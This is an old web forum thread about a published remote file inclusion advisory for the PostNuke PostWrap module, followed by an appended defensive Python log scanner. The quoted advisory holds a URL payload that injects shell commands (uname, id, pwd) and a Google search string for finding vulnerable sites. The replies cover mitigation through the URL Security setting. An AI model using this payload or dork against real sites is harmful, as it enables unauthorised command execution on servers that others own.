Spidean Forums

Author: Subject: Somebody's posted a Hack !!

Newbie





Posts: 1
Registered: 2/26/2005
Status: Offline

  posted on 2/26/2005 at 11:14 AM
Greetings All !

Newbie here! Just installed PostNuke yesterday and Autotheme today.

Didn't realize at first that PostWrap came from this particular website, so I did a Google search for "+postnuke +PostWrap".

The very FIRST item that Google lists is some sort of hacker's post on how to hack into your server (I think) by feeding PostWrap a particular string of data!

Link is:

http://www.milw0rm.com/id.php?id=800

Actual text says:

".,-*'^'~*-,._.,-*'^'~*-,._.,-*'^'~*-,._.,-*'^'~*-,._.,-*'^'~*-,._.,-*'^'~* -,._."
".,-*-,._ -.,-*-,."
".,-*-,._ ALBANIA SECURITY CLAN -.,-*-,."
".,-*-,._ -.,-*-,."
".,-*-,._ ...::www.albanianhaxorz.org::... -.,-*-,."
".,-*-,.- -.,-*-,."
".,-*-,.- PROUD TO BE ALBANIAN -.,-*-,."
".,-*-,._ -.,-*-,."
".,-*-,._ Copyright (c) 2005 ASC irc.gigachat.net #ASC -.,-*-,."
".,-*-,._ -.,-*-,."
".,-*-,._.,-*-,._.,-*-,._.,-*-,._.,-*-,._.,-*-,._.,-*-,._.,-*-,._.,-*-,.-., -*-,."


/index.php?module=PostWrap&page=http://localhost/asc?&cmd=uname%20- a;w;id;pwd

on google */index.php?module=PostWrap&page= ext:php have fun



".,-*'^'~*-,._.,-*'^'~*-,._.,-*'^'~*-,._.,-*'^'~*-,._.,-*'^'~*-,._.,-*'^'~* -,._."
".,-*-,._ -.,-*-,."
".,-*-,._ ALBANIA SECURITY CLAN -.,-*-,."
".,-*-,._ -.,-*-,."
".,-*-,._ ...::www.albanianhaxorz.org::... -.,-*-,."
".,-*-,.- -.,-*-,."
".,-*-,.- PROUD TO BE ALBANIAN -.,-*-,."
".,-*-,._ -.,-*-,."
".,-*-,._ Copyright (c) 2005 ASC irc.gigachat.net #ASC -.,-*-,."
".,-*-,._ -.,-*-,."
".,-*-,._.,-*-,._.,-*-,._.,-*-,._.,-*-,._.,-*-,._.,-*-,._.,-*-,._.,-*-,.-., -*-,."
# milw0rm.com [2005-02-08]


Wondered if anybody had spotted that since the date on that is only a few weeks old ?

Just thought I'd try to notify the author via this post.


Thanks!

-= Dave =-


 

Newbie




Posts: 1
Registered: 8/7/2004
Status: Offline

  posted on 3/10/2005 at 11:01 AM
Easy to block:
Under General configuration:
set: Compare URLs against URL Security? to YES

I'm actually surprised this got listed as an advisory. It's almost like posting an advisory that a Windows server has Telnet open -- so configure the system not to run it! Same thing here - tell PostWrap to only allow URLs in your URL Security list.

[Edited on 10/3/2005 by burke]

 

____________________
Burke - MCP+I, MCSE, MCSD, CNE, CCA, CCNA
http://www.pctechsupplier.com
http://www.dimensionquest.com
http://www.dimensionquest.net

 

Administrator




Posts: 4575
Registered: 10/7/2002
Status: Online

  posted on 3/12/2005 at 01:21 PM
This security setting is on by default. You must specifically turn it off for this nebulous exploit to work.

Also, I have yet to see any working hack. What can be done?

-Shawn
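
Added example (not part of the thread and not PostWrap's own code): a log check for sites that want to confirm the URL Security setting described in the replies above is doing its job. It scans access-log lines for `module=PostWrap` requests whose `page=` value points at a host outside an allowlist. The allowlist contents, the exact-host matching rule, and the sample log lines are assumptions made for illustration.

```python
import re
from urllib.parse import parse_qs, urlsplit

# Assumption: hypothetical host standing in for the site's URL Security list.
ALLOWED_HOSTS = {"docs.example.org"}

# Request line of a common/combined access-log entry.
REQUEST_RE = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')

# Constructed sample log lines (documentation IP ranges, example domains).
SAMPLE_LOG = [
    '192.0.2.10 - - [10/Mar/2005:11:01:00 +0000] "GET /index.php?module=PostWrap&page=http://docs.example.org/manual.html HTTP/1.1" 200 5120',
    '198.51.100.7 - - [10/Mar/2005:11:02:13 +0000] "GET /index.php?module=PostWrap&page=http://untrusted.example.net/x?&cmd=id HTTP/1.0" 200 312',
    '198.51.100.7 - - [10/Mar/2005:11:02:40 +0000] "GET /index.php?module=PostWrap&page=http%3A%2F%2Funtrusted.example.net%2Fx HTTP/1.0" 200 312',
    '192.0.2.10 - - [10/Mar/2005:11:03:05 +0000] "GET /index.php?module=News&page=2 HTTP/1.1" 200 900',
]

def postwrap_target(request_uri):
    """Return the decoded page= value of a PostWrap request, else None."""
    query = parse_qs(request_uri.partition("?")[2], keep_blank_values=True)
    if "postwrap" not in (m.lower() for m in query.get("module", [])):
        return None
    return query.get("page", [""])[0]

def classify(target):
    """Return 'local', 'allowed' or 'blocked' for a page= value."""
    try:
        parts = urlsplit(target)
    except ValueError:  # malformed URL: treat as not allowed
        return "blocked"
    if not parts.scheme and not parts.netloc:
        return "local"  # relative path, no remote host involved
    host = (parts.hostname or "").lower()
    ok = parts.scheme in ("http", "https") and host in ALLOWED_HOSTS
    return "allowed" if ok else "blocked"

def scan(lines):
    """Return (client_ip, target) for PostWrap requests aimed off-allowlist."""
    hits = []
    for line in lines:
        m = REQUEST_RE.search(line)
        if not m:
            continue
        target = postwrap_target(m.group(1))
        if target is not None and classify(target) == "blocked":
            hits.append((line.split(" ", 1)[0], target))
    return hits

if __name__ == "__main__":
    for ip, target in scan(SAMPLE_LOG):
        print(f"off-allowlist PostWrap target from {ip}: {target}")
```

Hits in the log do not show that a request succeeded; with URL Security enabled they are simply attempts that the module should have refused.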

 